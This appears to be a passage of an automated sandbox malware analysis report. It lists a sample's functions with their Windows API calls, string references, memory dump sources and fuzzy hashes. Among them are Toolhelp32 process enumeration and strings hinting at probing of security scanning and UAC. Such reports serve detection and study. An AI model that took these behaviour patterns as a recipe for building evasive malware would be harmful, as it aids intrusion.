                                                                                                                        Function 029C7D9C Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 029C7DB0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3934441357-0
                                                                                                                        • Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                                                        • Instruction ID: 041ce29cf34a8b9461030b28850c37d3b65ea16c243a1f0edcf92493e0d4e83b
                                                                                                                        • Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                                                        • Instruction Fuzzy Hash: 0ED05B723081107AD220A95E5D44EF75BDCCFC9770F10063DB698C3180D7208C018672
                                                                                                                        Function 029C7E18 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesA.KERNEL32(00000000,?,029DF8CC,ScanString,02A2137C,029EAFD8,OpenSession,02A2137C,029EAFD8,ScanString,02A2137C,029EAFD8,UacScan,02A2137C,029EAFD8,UacInitialize), ref: 029C7E23
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3188754299-0
                                                                                                                        • Opcode ID: 39d99aea2b4b3de8ff8324b5e373e5cbc7456bababb3b7d58f404b20ec88a84a
                                                                                                                        • Instruction ID: 59677d9a51fad8694a35c499defaef7ea608217b56f791c4c0ae50ca679f9a59
                                                                                                                        • Opcode Fuzzy Hash: 39d99aea2b4b3de8ff8324b5e373e5cbc7456bababb3b7d58f404b20ec88a84a
                                                                                                                        • Instruction Fuzzy Hash: 8AC08CE33023000A5A5461FC0CC409A428C09881383B42B3DB038C72E2D33188126873
                                                                                                                        Function 029C7E3C Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesA.KERNEL32(00000000,?,029E2A49,ScanString,02A2137C,029EAFD8,OpenSession,02A2137C,029EAFD8,ScanBuffer,02A2137C,029EAFD8,OpenSession,02A2137C,029EAFD8,Initialize), ref: 029C7E47
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3188754299-0
                                                                                                                        • Opcode ID: d4a25932c1186a40cb6d5613e0fc1b23b5cf5f8b84d23e416c631f776c8215f9
                                                                                                                        • Instruction ID: 7e755a576b30adbe00816e8c57d725a114483400a10d6344482446b66498c4b1
                                                                                                                        • Opcode Fuzzy Hash: d4a25932c1186a40cb6d5613e0fc1b23b5cf5f8b84d23e416c631f776c8215f9
                                                                                                                        • Instruction Fuzzy Hash: 01C08CF23023040E5E9062FC1CC02DA428E09845343B02B29E038D71E2D32198222823
                                                                                                                        Function 029C4C24 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3341692771-0
                                                                                                                        • Opcode ID: ec55763b5f82d1328600eb73f4eb151786d68f8a69a22224f81dbc62eca26ecd
                                                                                                                        • Instruction ID: b3d0b2a4ba8b2e10e4fa19b46ed59ad9bb4c378a51794e210b41b13f9816c4f4
                                                                                                                        • Opcode Fuzzy Hash: ec55763b5f82d1328600eb73f4eb151786d68f8a69a22224f81dbc62eca26ecd
                                                                                                                        • Instruction Fuzzy Hash: BAC012A678022447EB315A98DCC0795A2CCDB49295B2410A5D408D7255E360DC004A66
                                                                                                                        Function 029EBB50 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • timeSetEvent.WINMM(00002710,00000000,029EBB44,00000000,00000001), ref: 029EBB60
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Eventtime
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2982266575-0
                                                                                                                        • Opcode ID: a31201e50ec6f48f3e73a460b28f931cc56a4267529f4fe0c60aa72e6b92cc11
                                                                                                                        • Instruction ID: 1a36be2979489c8e61679c920abb8ce024a6a6511982693a15f1dfd83dde0ad9
                                                                                                                        • Opcode Fuzzy Hash: a31201e50ec6f48f3e73a460b28f931cc56a4267529f4fe0c60aa72e6b92cc11
                                                                                                                        • Instruction Fuzzy Hash: 0EC092F0BD03003EFA2056A85CD2F2365CEE384B44FA0081ABA05EE2E1E6E258600A24
                                                                                                                        Function 029C4BE4 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SysAllocStringLen.OLEAUT32(00000000,?), ref: 029C4BEB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2525500382-0
                                                                                                                        • Opcode ID: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                                                                                                        • Instruction ID: b5de3cb78889e929d323545b806468c62898a350d62c4ffda331eb6934dcc8ee
                                                                                                                        • Opcode Fuzzy Hash: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                                                                                                        • Instruction Fuzzy Hash: 29B0123C74820218FB1012610D10B3A008C0FA0287FB4209D9E29C80C4FF00C0008837
                                                                                                                        Function 029C4BFC Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 029C4C03
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3341692771-0
                                                                                                                        • Opcode ID: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
                                                                                                                        • Instruction ID: 17732d357f4bf200c91d8a0071169db7fde74d86d9601632f1225ef1b6e54b7d
                                                                                                                        • Opcode Fuzzy Hash: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
                                                                                                                        • Instruction Fuzzy Hash: 3BA022EC2803030A8F0B232C80A002A203B3FE03003FAC0EC00000A0288F3AC000AC3A
                                                                                                                        Function 029C15CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,029C1A03,?,029C2000), ref: 029C15E2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4275171209-0
                                                                                                                        • Opcode ID: 8c9c6fe4a805c610042c6ca8ef2c7ce4d97320caf7c783c1f2c881d403a8ed4c
                                                                                                                        • Instruction ID: b1215253ae5d2e9162b9821561aac06c4f141b16eccdd17346c410337dbe4a6a
                                                                                                                        • Opcode Fuzzy Hash: 8c9c6fe4a805c610042c6ca8ef2c7ce4d97320caf7c783c1f2c881d403a8ed4c
                                                                                                                        • Instruction Fuzzy Hash: 3CF049F0B413008FEB09DF799A443017AD6EB8A354F20857DDB09DB388EB71D4128B04
                                                                                                                        Function 029C1682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,029C2000), ref: 029C16A4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4275171209-0
                                                                                                                        • Opcode ID: 859dce17adcd5c2ef7ce85fa27c23f43b42757efd669900800c360639c548640
                                                                                                                        • Instruction ID: 738eac51ad639ce92d091a9f2de163200f27920c149e37d4ac9c5d415b327e01
                                                                                                                        • Opcode Fuzzy Hash: 859dce17adcd5c2ef7ce85fa27c23f43b42757efd669900800c360639c548640
                                                                                                                        • Instruction Fuzzy Hash: 9FF0B4B2B40B95ABD7209F5E9C80792BB94FB50314F150139F94C97341DB70E8158FD8
                                                                                                                        Function 029C16E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 029C1704
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1263568516-0
                                                                                                                        • Opcode ID: acf6d5aa6fdb8867ca052827f4bb9ecd4d853e88c1b47cb7b5d7e200bcd07c15
                                                                                                                        • Instruction ID: b81ecd12c46e3ce2098004bab79c4e53804c3e91147f33682ab8321f4e208cc9
                                                                                                                        • Opcode Fuzzy Hash: acf6d5aa6fdb8867ca052827f4bb9ecd4d853e88c1b47cb7b5d7e200bcd07c15
                                                                                                                        • Instruction Fuzzy Hash: 1BE08675300301AFD7105A7D5D407127BDCEB94654F344479F549DB282D660E8158B69

                                                                                                                        Non-executed Functions

                                                                                                                        Function 029DA95C Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,029DABE3,?,?,029DAC75,00000000,029DAD51), ref: 029DA970
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 029DA988
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 029DA99A
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 029DA9AC
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 029DA9BE
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 029DA9D0
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 029DA9E2
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Process32First), ref: 029DA9F4
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 029DAA06
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 029DAA18
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 029DAA2A
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 029DAA3C
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 029DAA4E
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Module32First), ref: 029DAA60
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 029DAA72
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 029DAA84
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 029DAA96
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                        • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                        • API String ID: 667068680-597814768
                                                                                                                        • Opcode ID: f8c35d8dea0c40027c5320d2a16cee3298f7c98fcb6ec27c2316aec0f0dfdf29
                                                                                                                        • Instruction ID: 1a3d5874d6cefe2f7e657a1434841070baf0fc8141f084397f41a1895effaa1e
                                                                                                                        • Opcode Fuzzy Hash: f8c35d8dea0c40027c5320d2a16cee3298f7c98fcb6ec27c2316aec0f0dfdf29
                                                                                                                        • Instruction Fuzzy Hash: E03123B1E807209FFB10FFB8D984A3633AEEBC530071049A9A406DF245D778D8259F62
                                                                                                                        Function 029C58B4 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,029C7338,029C0000,029ED790), ref: 029C58D1
                                                                                                                        • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 029C58E8
                                                                                                                        • lstrcpynA.KERNEL32(?,?,?), ref: 029C5918
                                                                                                                        • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,029C7338,029C0000,029ED790), ref: 029C597C
                                                                                                                        • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,029C7338,029C0000,029ED790), ref: 029C59B2
                                                                                                                        • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,029C7338,029C0000,029ED790), ref: 029C59C5
                                                                                                                        • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,029C7338,029C0000,029ED790), ref: 029C59D7
                                                                                                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,029C7338,029C0000,029ED790), ref: 029C59E3
                                                                                                                        • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,029C7338,029C0000), ref: 029C5A17
                                                                                                                        • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,029C7338), ref: 029C5A23
                                                                                                                        • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 029C5A45
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                        • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                        • API String ID: 3245196872-1565342463
                                                                                                                        • Opcode ID: da9ba5567a4b2ba85ace21d141fbbfedd84c0bd61d547ab574b4545af33e16db
                                                                                                                        • Instruction ID: d5f5913bcf4d1d951be32f30ea71e1b3c9ee0a77e1a4d21590442da3120d2baa
                                                                                                                        • Opcode Fuzzy Hash: da9ba5567a4b2ba85ace21d141fbbfedd84c0bd61d547ab574b4545af33e16db
                                                                                                                        • Instruction Fuzzy Hash: D6416D71D00259AFDB10DAE8CC88ADEB3BDEF48340F6545A9A148E7241D730EE44CF65
                                                                                                                        Function 029C5B84 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 029C5B94
                                                                                                                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 029C5BA1
                                                                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 029C5BA7
                                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 029C5BD2
                                                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 029C5C19
                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 029C5C29
                                                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 029C5C51
                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 029C5C61
                                                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 029C5C87
                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 029C5C97
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
